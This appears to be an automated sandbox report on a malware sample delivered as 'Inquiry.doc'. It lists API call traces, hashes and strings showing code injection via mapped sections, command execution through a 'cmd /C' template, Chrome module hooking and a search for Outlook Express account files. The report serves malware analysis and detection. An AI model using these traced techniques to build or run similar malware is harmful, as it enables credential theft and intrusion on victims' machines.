  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:DA7FC1804FFFBD92337277B095147E63
Total matches:141
Initial Analysis Report:Open
Initial sample Analysis ID:64193
Initial sample SHA 256:E999616249FE0433E41C5B578EFB3333A0DBFCF040B6DE1C8AFA4905C4B736A1
Initial sample name:Inquiry.doc

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
